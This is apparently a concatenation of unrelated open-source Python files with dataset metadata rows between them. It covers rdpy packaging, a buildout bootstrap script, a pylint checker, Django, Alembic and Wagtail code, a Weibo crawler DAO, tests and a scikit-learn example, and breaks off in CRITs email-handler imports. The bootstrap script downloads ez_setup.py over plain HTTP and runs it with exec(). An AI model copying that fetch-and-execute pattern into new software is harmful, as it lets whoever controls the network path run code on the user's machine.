'rdpy.protocol.rdp.nla',
'rdpy.protocol.rdp.t125',
'rdpy.protocol.rfb',
'rdpy.ui'
],
ext_modules=[Extension('rle', ['ext/rle.c'])],
scripts = [
'bin/rdpy-rdpclient.py',
'bin/rdpy-rdphoneypot.py',
'bin/rdpy-rdpmitm.py',
'bin/rdpy-rdpscreenshot.py',
'bin/rdpy-rssplayer.py',
'bin/rdpy-vncclient.py',
'bin/rdpy-vncscreenshot.py'
],
install_requires=[
'twisted',
'pyopenssl',
'service_identity',
'qt4reactor',
'rsa',
'pyasn1',
],
)
| gpl-3.0 | 5,683,158,288,272,969,000 | 27.404255 | 179 | 0.659176 | false |
motmot/flymovieformat | bootstrap.py | 1 | 2578 | ##############################################################################
#
# Copyright (c) 2006 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Bootstrap a buildout-based project
Simply run this script in a directory containing a buildout.cfg.
The script accepts buildout command-line options, so you can
use the -c option to specify an alternate configuration file.
$Id$
"""
import os, shutil, sys, tempfile, urllib2
tmpeggs = tempfile.mkdtemp()
is_jython = sys.platform.startswith("java")
try:
import pkg_resources
except ImportError:
ez = {}
exec(urllib2.urlopen("http://peak.telecommunity.com/dist/ez_setup.py").read(), ez)
ez["use_setuptools"](to_dir=tmpeggs, download_delay=0)
import pkg_resources
if sys.platform == "win32":
def quote(c):
if " " in c:
return '"%s"' % c # work around spawn lamosity on windows
else:
return c
else:
def quote(c):
return c
cmd = "from setuptools.command.easy_install import main; main()"
ws = pkg_resources.working_set
if is_jython:
import subprocess
assert (
subprocess.Popen(
[sys.executable]
+ ["-c", quote(cmd), "-mqNxd", quote(tmpeggs), "zc.buildout"],
env=dict(
os.environ,
PYTHONPATH=ws.find(
pkg_resources.Requirement.parse("setuptools")
).location,
),
).wait()
== 0
)
else:
assert (
os.spawnle(
os.P_WAIT,
sys.executable,
quote(sys.executable),
"-c",
quote(cmd),
"-mqNxd",
quote(tmpeggs),
"zc.buildout",
dict(
os.environ,
PYTHONPATH=ws.find(
pkg_resources.Requirement.parse("setuptools")
).location,
),
)
== 0
)
ws.add_entry(tmpeggs)
ws.require("zc.buildout")
import zc.buildout.buildout
zc.buildout.buildout.main(sys.argv[1:] + ["bootstrap"])
shutil.rmtree(tmpeggs)
| bsd-3-clause | -4,471,996,207,131,079,000 | 25.040404 | 86 | 0.559348 | false |
ruchee/vimrc | vimfiles/bundle/vim-python/submodules/pylint/pylint/checkers/refactoring/len_checker.py | 1 | 4298 | # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/LICENSE
from typing import List
import astroid
from pylint import checkers, interfaces
from pylint.checkers import utils
class LenChecker(checkers.BaseChecker):
"""Checks for incorrect usage of len() inside conditions.
Pep8 states:
For sequences, (strings, lists, tuples), use the fact that empty sequences are false.
Yes: if not seq:
if seq:
No: if len(seq):
if not len(seq):
Problems detected:
* if len(sequence):
* if not len(sequence):
* elif len(sequence):
* elif not len(sequence):
* while len(sequence):
* while not len(sequence):
* assert len(sequence):
* assert not len(sequence):
* bool(len(sequence))
"""
__implements__ = (interfaces.IAstroidChecker,)
# configuration section name
name = "refactoring"
msgs = {
"C1801": (
"Do not use `len(SEQUENCE)` without comparison to determine if a sequence is empty",
"len-as-condition",
"Used when Pylint detects that len(sequence) is being used "
"without explicit comparison inside a condition to determine if a sequence is empty. "
"Instead of coercing the length to a boolean, either "
"rely on the fact that empty sequences are false or "
"compare the length against a scalar.",
)
}
priority = -2
options = ()
@utils.check_messages("len-as-condition")
def visit_call(self, node):
# a len(S) call is used inside a test condition
# could be if, while, assert or if expression statement
# e.g. `if len(S):`
if not utils.is_call_of_name(node, "len"):
return
# the len() call could also be nested together with other
# boolean operations, e.g. `if z or len(x):`
parent = node.parent
while isinstance(parent, astroid.BoolOp):
parent = parent.parent
# we're finally out of any nested boolean operations so check if
# this len() call is part of a test condition
if not utils.is_test_condition(node, parent):
return
len_arg = node.args[0]
generator_or_comprehension = (
astroid.ListComp,
astroid.SetComp,
astroid.DictComp,
astroid.GeneratorExp,
)
if isinstance(len_arg, generator_or_comprehension):
# The node is a generator or comprehension as in len([x for x in ...])
self.add_message("len-as-condition", node=node)
return
try:
instance = next(len_arg.infer())
except astroid.InferenceError:
# Probably undefined-variable, abort the check
return
mother_classes = self.base_classes_of_node(instance)
affected_by_pep8 = any(
t in mother_classes for t in ["str", "tuple", "list", "set"]
)
if "range" in mother_classes or (
affected_by_pep8 and not self.instance_has_bool(instance)
):
self.add_message("len-as-condition", node=node)
@staticmethod
def instance_has_bool(class_def: astroid.ClassDef) -> bool:
try:
class_def.getattr("__bool__")
return True
except astroid.AttributeInferenceError:
...
return False
@utils.check_messages("len-as-condition")
def visit_unaryop(self, node):
"""`not len(S)` must become `not S` regardless if the parent block
is a test condition or something else (boolean expression)
e.g. `if not len(S):`"""
if (
isinstance(node, astroid.UnaryOp)
and node.op == "not"
and utils.is_call_of_name(node.operand, "len")
):
self.add_message("len-as-condition", node=node)
@staticmethod
def base_classes_of_node(instance: astroid.nodes.ClassDef) -> List[astroid.Name]:
"""Return all the classes names that a ClassDef inherit from including 'object'."""
try:
return [instance.name] + [x.name for x in instance.ancestors()]
except TypeError:
return [instance.name]
| mit | -7,659,394,172,842,702,000 | 34.520661 | 98 | 0.597953 | false |
fanchunke1991/flask_website | migrations/versions/d8d1b418f41c_.py | 1 | 1046 | """empty message
Revision ID: d8d1b418f41c
Revises: 7f5c9e993be1
Create Date: 2017-02-15 21:03:05.958000
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd8d1b418f41c'
down_revision = '7f5c9e993be1'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('profiles',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('nickname', sa.String(length=10), nullable=False),
sa.Column('gender', sa.String(length=4), nullable=False),
sa.Column('address', sa.String(length=4), nullable=True),
sa.Column('discription', sa.Text(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('profiles')
# ### end Alembic commands ###
| mit | -7,483,645,544,517,779,000 | 27.27027 | 65 | 0.670172 | false |
taedori81/gentlecoffee | home/templatetags/gentlecoffee_tags.py | 1 | 2563 | from django import template
from ..models import Area
register = template.Library()
@register.assignment_tag(takes_context=True)
def get_site_root(context):
return context['request'].site.root_page
@register.inclusion_tag("home/navbar/navbar.html", takes_context=True)
def display_navbar(context):
parent = get_site_root(context)
if 'self' in context:
calling_page = context['self']
else:
calling_page = None
menuitems = parent.get_children().live().in_menu()
for menuitem in menuitems:
menuitem.show_dropdown = menuitem.get_children().live().in_menu().exists()
menuitem.active = (calling_page.url.startswith(menuitem.url) if calling_page else False)
return {
"calling_page": calling_page,
"menuitems": menuitems,
"request": context['request']
}
@register.inclusion_tag('home/navbar/navbar_dropdown.html', takes_context=True)
def display_navbar_dropdown(context, parent):
menuitems_children = parent.get_children().live().in_menu()
return {
"parent": parent,
"menuitems_children": menuitems_children,
"request": context['request'],
}
@register.inclusion_tag('home/include/side_menu_area.html', takes_context=True)
def display_side_menu_area(context):
request = context['request']
areas = Area.objects.all()
# TODO: Need to build an href to filter the page
area_items = []
for area in areas:
item_name = area.area_name
item_href = '?area=' + item_name
area_items.append({"name": item_name, "href": item_href})
return {
"request": request,
"areas": areas,
"area_items": area_items
}
@register.filter
def url_param_dict_to_list(url_items_dict):
"""Turn this dictionary into a param list for the URL"""
params_list = ""
for key,value in url_items_dict:
if key != "page":
params_list += "&%s=%s" % (key, value)
return params_list
@register.filter
def get_item(dictionary, key):
return dictionary.get(key)
@register.inclusion_tag('home/include/blog_item.html', takes_context=True)
def display_blog_list(context, blog_list):
blogs = []
for blog in blog_list:
for block in blog.body:
if block.block_type == 'heading':
blog.heading = block.value
if block.block_type == 'photo':
blog.photo = block.value
blogs.append(blog)
request = context['request']
return {
"request": request,
"blogs": blogs,
}
| bsd-3-clause | 5,064,137,035,026,292,000 | 26.265957 | 96 | 0.630121 | false |
garethr/django-project-templates | setup.py | 1 | 1174 | from setuptools import setup, find_packages
import os
setup(
name='django-project-templates',
version = "0.11",
description="Paster templates for creating Django projects",
author='Gareth Rushgrove',
author_email='[email protected]',
url='http://github.com/garethr/django-project-templates/',
packages = find_packages('src'),
package_dir = {'':'src'},
license = "MIT",
keywords = "django paster",
install_requires=[
'setuptools',
'PasteScript>=1.3',
'Cheetah',
'fabric',
],
include_package_data=True,
zip_safe=False,
entry_points="""
[paste.paster_create_template]
django_project=django_project_templates.pastertemplates:DjangoProjectTemplate
django_cruisecontrol_project=django_project_templates.pastertemplates:DjangoCruiseControlTemplate
newsapps_project=django_project_templates.pastertemplates:NewsAppsProjectTemplate
""",
classifiers = [
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
'Operating System :: OS Independent',
'Programming Language :: Python',
],
)
| mit | -1,137,145,708,265,585,200 | 32.542857 | 105 | 0.66184 | false |
migasfree/migasfree-backend | migasfree/client/models/fault.py | 1 | 4720 | # -*- coding: utf-8 -*-
# Copyright (c) 2015-2021 Jose Antonio Chavarría <[email protected]>
# Copyright (c) 2015-2021 Alberto Gacías <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
from django.db.models.aggregates import Count
from django.utils.translation import gettext_lazy as _
from ...core.models import Project
from .event import Event
from .fault_definition import FaultDefinition
class DomainFaultManager(models.Manager):
def get_queryset(self):
return super().get_queryset().select_related(
'project',
'fault_definition',
'computer',
'computer__project',
'computer__sync_user',
)
def scope(self, user):
qs = self.get_queryset()
if user and not user.is_view_all():
qs = qs.filter(
project_id__in=user.get_projects(),
computer_id__in=user.get_computers()
)
return qs
class UncheckedManager(DomainFaultManager):
def get_queryset(self):
return super().get_queryset().filter(checked=0)
def scope(self, user):
qs = super().scope(user).filter(checked=0)
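# Show faults whose definition is explicitly assigned to this user, plus
# faults whose definition has no assigned users at all.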
if user:
qs = qs.filter(models.Q(fault_definition__users__id__in=[user.id, ])
| models.Q(fault_definition__users=None))
else:
qs = qs.filter(fault_definition__users=None)
return qs
class FaultManager(DomainFaultManager):
def create(self, computer, definition, result):
obj = Fault()
obj.computer = computer
obj.project = computer.project
obj.fault_definition = definition
obj.result = result
obj.save()
return obj
class Fault(Event):
USER_FILTER_CHOICES = (
('me', _('To check for me')),
('only_me', _('Assigned to me')),
('others', _('Assigned to others')),
('unassigned', _('Unassigned')),
)
fault_definition = models.ForeignKey(
FaultDefinition,
on_delete=models.CASCADE,
verbose_name=_("fault definition")
)
result = models.TextField(
verbose_name=_("result"),
null=True,
blank=True
)
checked = models.BooleanField(
verbose_name=_("checked"),
default=False,
)
project = models.ForeignKey(
Project,
on_delete=models.CASCADE,
verbose_name=_("project")
)
objects = FaultManager()
unchecked = UncheckedManager()
@staticmethod
def unchecked_count(user=None):
queryset = Fault.unchecked.scope(user)
if user:
queryset = queryset.filter(
models.Q(fault_definition__users__id__in=[user.id, ])
| models.Q(fault_definition__users=None)
)
return queryset.count()
@staticmethod
def unchecked_by_project(user):
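# Groups unchecked faults by platform ('inner') and by project ('outer'),
# each annotated with its count of unchecked faults.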
total = Fault.unchecked_count(user)
projects = list(Fault.unchecked.scope(user).values(
'project__name',
'project__id',
'project__platform__id',
).annotate(
count=Count('id')
).order_by('project__platform__id', '-count'))
platforms = list(Fault.unchecked.scope(user).values(
'project__platform__id',
'project__platform__name'
).annotate(
count=Count('id')
).order_by('project__platform__id', '-count'))
return {
'total': total,
'inner': platforms,
'outer': projects,
}
@staticmethod
def group_by_definition(user=None):
return Fault.objects.scope(user).values(
'fault_definition__id', 'fault_definition__name'
).annotate(
count=models.aggregates.Count('fault_definition__id')
).order_by('-count')
def checked_ok(self):
self.checked = True
self.save()
def list_users(self):
return self.fault_definition.list_users()
class Meta:
app_label = 'client'
verbose_name = _('Fault')
verbose_name_plural = _('Faults')
| gpl-3.0 | 4,239,233,166,619,057,000 | 27.421687 | 80 | 0.597075 | false |
skurtapp/django-rest-framework-jwt | setup.py | 1 | 3378 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import shutil
import sys
from setuptools import setup
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
with open(os.path.join(package, '__init__.py'), 'rb') as init_py:
src = init_py.read().decode('utf-8')
return re.search("__version__ = ['\"]([^'\"]+)['\"]", src).group(1)
name = 'skurt-djangorestframework-jwt'
version = get_version('skurt_rest_framework_jwt')
package = 'skurt_rest_framework_jwt'
description = 'JSON Web Token based authentication for Django REST framework'
url = 'https://github.com/skurtapp/django-rest-framework-jwt'
author = 'Jose Padilla'
author_email = '[email protected]'
license = 'MIT'
install_requires = [
'PyJWT>=1.4.0,<2.0.0'
]
def read(*paths):
"""
Build a file path from paths and return the contents.
"""
with open(os.path.join(*paths), 'r') as f:
return f.read()
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
if sys.argv[-1] == 'publish':
if os.system('pip freeze | grep wheel'):
print('wheel not installed.\nUse `pip install wheel`.\nExiting.')
sys.exit()
if os.system('pip freeze | grep twine'):
print('twine not installed.\nUse `pip install twine`.\nExiting.')
sys.exit()
os.system('python setup.py sdist bdist_wheel')
os.system('twine upload dist/*')
shutil.rmtree('dist')
shutil.rmtree('build')
shutil.rmtree('skurt_djangorestframework_jwt.egg-info')
print('You probably want to also tag the version now:')
print(" git tag -a {0} -m 'version {0}'".format(version))
print(' git push --tags')
sys.exit()
setup(
name=name,
version=version,
url=url,
license=license,
description=description,
long_description=read('README.rst'),
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
install_requires=install_requires,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP',
]
)
| mit | 6,180,108,985,916,996,000 | 29.160714 | 77 | 0.617229 | false |
deets/clang-complete | tests/test_async_api.py | 1 | 2891 | import os
import tempfile
from unittest import TestCase
from cStringIO import StringIO
from clangcomplete.libclang import setup
from clangcomplete.api import (
mainloop,
AsyncSession,
)
from clangcomplete.util import source_for_autocomplete
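# The /*POINT*/ marker in the snippets below shows where completion is
# requested; source_for_autocomplete() returns that (row, column) position
# together with the source text that is sent to the completion session.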
TEST_SOURCE = """
struct Foo {
int bar;
int baz;
};
int main(int argc, const char* argv) {
// Some comment
Foo foo;
foo./*POINT*/
return 0;
}
"""
TEST_SOURCE_WITH_INCLUDE = """
#include "foo.hh"
int main(int argc, char** argv) {
Foo foo;
foo./*POINT*/
}
"""
TEST_INCLUDE = """
struct Foo {
int bar;
int baz;
int padamm;
};
"""
class TestAsyncAPI(TestCase):
def setUp(self):
setup()
def test_mainloop(self):
inf = StringIO("SHUTDOWN\n")
outf = StringIO()
mainloop("test.c", [], inf, outf)
def test_sourcefile_cmd(self):
session = AsyncSession("test.c", [])
source = TEST_SOURCE
inf = StringIO("source_length:%i\n%s\n\n" % (len(source), source))
outf = StringIO()
session.sourcefile(inf, outf)
self.assertEqual(
source,
session.source,
)
def test_completion(self):
session = AsyncSession("test.c", [])
with session:
point, source = source_for_autocomplete(TEST_SOURCE)
inf = StringIO("row:%i\ncolumn:%i\nsource_length:%i\n%s\n\n" %
(point[0], point[1], len(source), source))
outf = StringIO()
session.completion(inf, outf)
content = outf.getvalue()
assert content.endswith("$")
assert "COMPLETION: bar" in content
assert "COMPLETION: baz" in content
def test_cmdline_args(self):
session = AsyncSession("test.c", [])
with session:
assert not session.args
args = ["-Ifoobarbaz", "-Ipadam"]
inf = StringIO("num_args:%i\n%s\n" % (len(args), " ".join(args)))
outf = StringIO()
session.cmdlineargs(inf, outf)
self.assertEqual(
args,
session.args,
)
def test_completion_with_args(self):
incdir = tempfile.mkdtemp()
with open(os.path.join(incdir, "foo.hh"), "w") as outf:
outf.write(TEST_INCLUDE)
session = AsyncSession("test.c", ["-I%s" % incdir])
with session:
point, source = source_for_autocomplete(TEST_SOURCE_WITH_INCLUDE)
inf = StringIO("row:%i\ncolumn:%i\nsource_length:%i\n%s\n\n" %
(point[0], point[1], len(source), source))
outf = StringIO()
session.completion(inf, outf)
content = outf.getvalue()
assert content.endswith("$")
assert "COMPLETION: bar" in content
assert "COMPLETION: baz" in content
| mit | 5,010,866,645,818,686,000 | 23.709402 | 77 | 0.552058 | false |
mbohlool/client-python | kubernetes/test/test_policy_v1beta1_api.py | 1 | 2822 | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.8.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.apis.policy_v1beta1_api import PolicyV1beta1Api
class TestPolicyV1beta1Api(unittest.TestCase):
""" PolicyV1beta1Api unit test stubs """
def setUp(self):
self.api = kubernetes.client.apis.policy_v1beta1_api.PolicyV1beta1Api()
def tearDown(self):
pass
def test_create_namespaced_pod_disruption_budget(self):
"""
Test case for create_namespaced_pod_disruption_budget
"""
pass
def test_delete_collection_namespaced_pod_disruption_budget(self):
"""
Test case for delete_collection_namespaced_pod_disruption_budget
"""
pass
def test_delete_namespaced_pod_disruption_budget(self):
"""
Test case for delete_namespaced_pod_disruption_budget
"""
pass
def test_get_api_resources(self):
"""
Test case for get_api_resources
"""
pass
def test_list_namespaced_pod_disruption_budget(self):
"""
Test case for list_namespaced_pod_disruption_budget
"""
pass
def test_list_pod_disruption_budget_for_all_namespaces(self):
"""
Test case for list_pod_disruption_budget_for_all_namespaces
"""
pass
def test_patch_namespaced_pod_disruption_budget(self):
"""
Test case for patch_namespaced_pod_disruption_budget
"""
pass
def test_patch_namespaced_pod_disruption_budget_status(self):
"""
Test case for patch_namespaced_pod_disruption_budget_status
"""
pass
def test_read_namespaced_pod_disruption_budget(self):
"""
Test case for read_namespaced_pod_disruption_budget
"""
pass
def test_read_namespaced_pod_disruption_budget_status(self):
"""
Test case for read_namespaced_pod_disruption_budget_status
"""
pass
def test_replace_namespaced_pod_disruption_budget(self):
"""
Test case for replace_namespaced_pod_disruption_budget
"""
pass
def test_replace_namespaced_pod_disruption_budget_status(self):
"""
Test case for replace_namespaced_pod_disruption_budget_status
"""
pass
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -6,518,013,391,887,288,000 | 20.378788 | 105 | 0.606308 | false |
ResolveWang/WeiboSpider | db/dao.py | 1 | 7194 | from sqlalchemy import text
from sqlalchemy.exc import IntegrityError as SqlalchemyIntegrityError
from pymysql.err import IntegrityError as PymysqlIntegrityError
from sqlalchemy.exc import InvalidRequestError
from .basic import db_session
from .models import (
LoginInfo, KeywordsWbdata, KeyWords, SeedIds, UserRelation,
WeiboComment, WeiboRepost, User, WeiboData, WeiboPraise
)
from decorators import db_commit_decorator
class CommonOper:
@classmethod
@db_commit_decorator
def add_one(cls, data):
db_session.add(data)
db_session.commit()
@classmethod
@db_commit_decorator
def add_all(cls, datas):
try:
db_session.add_all(datas)
db_session.commit()
except (SqlalchemyIntegrityError, PymysqlIntegrityError, InvalidRequestError):
for data in datas:
cls.add_one(data)
class LoginInfoOper:
@classmethod
def get_login_info(cls):
return db_session.query(LoginInfo.name, LoginInfo.password, LoginInfo.enable). \
filter(text('enable=1')).all()
@classmethod
@db_commit_decorator
def freeze_account(cls, name, rs):
"""
:param name: login account
        :param rs: 0 stands for banned, 1 stands for normal, 2 stands for invalid name or password
:return:
"""
account = db_session.query(LoginInfo).filter(LoginInfo.name == name).first()
account.enable = rs
db_session.commit()
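    # Hedged usage sketch (editor's addition, not part of the original module):
    # a crawler that detects a ban page would typically disable the offending
    # account before rotating to the next one, e.g.
    #   LoginInfoOper.freeze_account('crawler01', 0)   # 0 -> banned
    #   LoginInfoOper.freeze_account('crawler02', 2)   # 2 -> bad credentials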
class KeywordsDataOper:
@classmethod
@db_commit_decorator
def insert_keyword_wbid(cls, keyword_id, wbid):
keyword_wbdata = KeywordsWbdata()
keyword_wbdata.wb_id = wbid
keyword_wbdata.keyword_id = keyword_id
db_session.add(keyword_wbdata)
db_session.commit()
class KeywordsOper:
@classmethod
def get_search_keywords(cls):
return db_session.query(KeyWords.keyword, KeyWords.id).filter(text('enable=1')).all()
@classmethod
@db_commit_decorator
def set_useless_keyword(cls, keyword):
search_word = db_session.query(KeyWords).filter(KeyWords.keyword == keyword).first()
search_word.enable = 0
db_session.commit()
class SeedidsOper:
@classmethod
def get_seed_ids(cls):
"""
        Get all user ids to be crawled
:return: user ids
"""
return db_session.query(SeedIds.uid).filter(text('is_crawled=0')).all()
@classmethod
def get_home_ids(cls):
"""
        Get all user ids whose home pages need to be crawled
:return: user ids
"""
return db_session.query(SeedIds.uid).filter(text('home_crawled=0')).all()
@classmethod
@db_commit_decorator
def set_seed_crawled(cls, uid, result):
"""
:param uid: user id that is crawled
:param result: crawling result, 1 stands for succeed, 2 stands for fail
:return: None
"""
seed = db_session.query(SeedIds).filter(SeedIds.uid == uid).first()
if seed and seed.is_crawled == 0:
seed.is_crawled = result
else:
seed = SeedIds(uid=uid, is_crawled=result)
db_session.add(seed)
db_session.commit()
@classmethod
def get_seed_by_id(cls, uid):
return db_session.query(SeedIds).filter(SeedIds.uid == uid).first()
@classmethod
@db_commit_decorator
def insert_seeds(cls, ids):
db_session.execute(SeedIds.__table__.insert().prefix_with('IGNORE'), [{'uid': i} for i in ids])
db_session.commit()
@classmethod
@db_commit_decorator
def set_seed_other_crawled(cls, uid):
"""
update it if user id already exists, else insert
:param uid: user id
:return: None
"""
seed = cls.get_seed_by_id(uid)
if seed is None:
seed = SeedIds(uid=uid, is_crawled=1, other_crawled=1, home_crawled=1)
db_session.add(seed)
else:
seed.other_crawled = 1
db_session.commit()
@classmethod
@db_commit_decorator
def set_seed_home_crawled(cls, uid):
"""
:param uid: user id
:return: None
"""
seed = cls.get_seed_by_id(uid)
if seed is None:
seed = SeedIds(uid=uid, is_crawled=0, other_crawled=0, home_crawled=1)
db_session.add(seed)
else:
seed.home_crawled = 1
db_session.commit()
class UserOper(CommonOper):
@classmethod
def get_user_by_uid(cls, uid):
return db_session.query(User).filter(User.uid == uid).first()
@classmethod
def get_user_by_name(cls,user_name):
return db_session.query(User).filter(User.name == user_name).first()
class UserRelationOper(CommonOper):
@classmethod
def get_user_by_uid(cls, uid, other_id, type):
user = db_session.query(UserRelation).filter_by(user_id = uid, follow_or_fans_id = other_id).first()
if user:
return True
else:
return False
class WbDataOper(CommonOper):
@classmethod
def get_wb_by_mid(cls, mid):
return db_session.query(WeiboData).filter(WeiboData.weibo_id == mid).first()
@classmethod
def get_weibo_comment_not_crawled(cls):
return db_session.query(WeiboData.weibo_id).filter(text('comment_crawled=0')).all()
@classmethod
def get_weibo_praise_not_crawled(cls):
return db_session.query(WeiboData.weibo_id).filter(text('praise_crawled=0')).all()
@classmethod
def get_weibo_repost_not_crawled(cls):
return db_session.query(WeiboData.weibo_id, WeiboData.uid).filter(text('repost_crawled=0')).all()
@classmethod
def get_weibo_dialogue_not_crawled(cls):
return db_session.query(WeiboData.weibo_id).filter(text('dialogue_crawled=0')).all()
@classmethod
@db_commit_decorator
def set_weibo_comment_crawled(cls, mid):
data = cls.get_wb_by_mid(mid)
if data:
data.comment_crawled = 1
db_session.commit()
@classmethod
@db_commit_decorator
def set_weibo_praise_crawled(cls, mid):
data = cls.get_wb_by_mid(mid)
if data:
data.praise_crawled = 1
db_session.commit()
@classmethod
@db_commit_decorator
def set_weibo_repost_crawled(cls, mid):
data = cls.get_wb_by_mid(mid)
if data:
data.repost_crawled = 1
db_session.commit()
@classmethod
@db_commit_decorator
def set_weibo_dialogue_crawled(cls, mid):
data = cls.get_wb_by_mid(mid)
if data:
data.dialogue_crawled = 1
db_session.commit()
class CommentOper(CommonOper):
@classmethod
def get_comment_by_id(cls, cid):
return db_session.query(WeiboComment).filter(WeiboComment.comment_id == cid).first()
class PraiseOper(CommonOper):
@classmethod
def get_Praise_by_id(cls, pid):
return db_session.query(WeiboPraise).filter(WeiboPraise.weibo_id == pid).first()
class RepostOper(CommonOper):
@classmethod
def get_repost_by_rid(cls, rid):
return db_session.query(WeiboRepost).filter(WeiboRepost.weibo_id == rid).first()
| mit | 6,026,674,423,055,466,000 | 29.210084 | 108 | 0.624478 | false |
karstenw/nodebox-pyobjc | examples/Extended Application/sklearn/examples/ensemble/plot_random_forest_regression_multioutput.py | 1 | 3492 | """
============================================================
Comparing random forests and the multi-output meta estimator
============================================================
An example to compare multi-output regression with random forest and
the :ref:`multioutput.MultiOutputRegressor <multiclass>` meta-estimator.
This example illustrates the use of the
:ref:`multioutput.MultiOutputRegressor <multiclass>` meta-estimator
to perform multi-output regression. A random forest regressor is used,
which supports multi-output regression natively, so the results can be
compared.
The random forest regressor will only ever predict values within the
range of observations or closer to zero for each of the targets. As a
result the predictions are biased towards the centre of the circle.
Using a single underlying feature the model learns both the
x and y coordinate as output.
"""
print(__doc__)
# Author: Tim Head <[email protected]>
#
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
from sklearn.multioutput import MultiOutputRegressor
# nodebox section
if __name__ == '__builtin__':
# were in nodebox
import os
import tempfile
W = 800
inset = 20
size(W, 600)
plt.cla()
plt.clf()
plt.close('all')
def tempimage():
fob = tempfile.NamedTemporaryFile(mode='w+b', suffix='.png', delete=False)
fname = fob.name
fob.close()
return fname
imgx = 20
imgy = 0
def pltshow(plt, dpi=150):
global imgx, imgy
temppath = tempimage()
plt.savefig(temppath, dpi=dpi)
dx,dy = imagesize(temppath)
w = min(W,dx)
image(temppath,imgx,imgy,width=w)
imgy = imgy + dy + 20
os.remove(temppath)
size(W, HEIGHT+dy+40)
else:
def pltshow(mplpyplot):
mplpyplot.show()
# nodebox section end
# Create a random dataset
rng = np.random.RandomState(1)
X = np.sort(200 * rng.rand(600, 1) - 100, axis=0)
y = np.array([np.pi * np.sin(X).ravel(), np.pi * np.cos(X).ravel()]).T
y += (0.5 - rng.rand(*y.shape))
X_train, X_test, y_train, y_test = train_test_split(X, y,
train_size=400,
random_state=4)
max_depth = 30
regr_multirf = MultiOutputRegressor(RandomForestRegressor(max_depth=max_depth,
random_state=0))
regr_multirf.fit(X_train, y_train)
regr_rf = RandomForestRegressor(max_depth=max_depth, random_state=2)
regr_rf.fit(X_train, y_train)
# Predict on new data
y_multirf = regr_multirf.predict(X_test)
y_rf = regr_rf.predict(X_test)
# Plot the results
plt.figure()
s = 50
a = 0.4
plt.scatter(y_test[:, 0], y_test[:, 1], edgecolor='k',
c="navy", s=s, marker="s", alpha=a, label="Data")
plt.scatter(y_multirf[:, 0], y_multirf[:, 1], edgecolor='k',
c="cornflowerblue", s=s, alpha=a,
label="Multi RF score=%.2f" % regr_multirf.score(X_test, y_test))
plt.scatter(y_rf[:, 0], y_rf[:, 1], edgecolor='k',
c="c", s=s, marker="^", alpha=a,
label="RF score=%.2f" % regr_rf.score(X_test, y_test))
plt.xlim([-6, 6])
plt.ylim([-6, 6])
plt.xlabel("target 1")
plt.ylabel("target 2")
plt.title("Comparing random forests and the multi-output meta estimator")
plt.legend()
# plt.show()
pltshow(plt)
| mit | -3,734,786,197,194,947,600 | 30.459459 | 82 | 0.61827 | false |
korrosivesec/crits | crits/emails/handlers.py | 1 | 65619 | from __future__ import absolute_import
import datetime
import email as eml
from email.parser import Parser
from email.utils import parseaddr, getaddresses, mktime_tz, parsedate_tz
import hashlib
import json
import magic
import re
import yaml
import io
import sys
import olefile
from dateutil.parser import parse as date_parser
from django.conf import settings
from crits.core.forms import DownloadFileForm
from crits.emails.forms import EmailYAMLForm
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.template.loader import render_to_string
from crits.campaigns.forms import CampaignForm
from crits.config.config import CRITsConfig
